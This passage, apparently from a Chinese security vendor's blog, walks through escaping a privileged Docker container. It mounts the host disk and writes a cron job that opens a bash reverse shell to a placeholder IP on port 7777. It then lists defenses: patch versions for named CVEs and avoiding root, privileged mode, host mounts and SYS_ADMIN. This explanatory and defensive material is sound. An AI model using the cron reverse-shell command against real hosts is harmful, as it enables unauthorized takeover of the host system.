同理,新建一个目录/test2,将/dev/sda3挂载到新建的目录下,并查看test2目录下的内容,发现可以访问宿主机上/目录下的内容了
在计划任务里写入一个反弹shell:
echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root
在Docker上开启netcat监听7777端口,成功接收到宿主主机的Shell,实现Docker逃逸。
Docker逃逸防御
更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736。
runc版本 >1.0-rc6
k8s 集群版本>1.12
Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险。
不建议以root权限运行Docker服务。
不建议以privileged(特权模式)启动Docker。
不建议将宿主机目录挂载至容器目录。
不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险。
美创科技聚焦数据安全,围绕数据安全、灾难备份、数据管理、智能运维等多方面挖掘和铸造数据价值,凭借卓越的产品技术和服务赢得了众多行业的认可和用户口碑!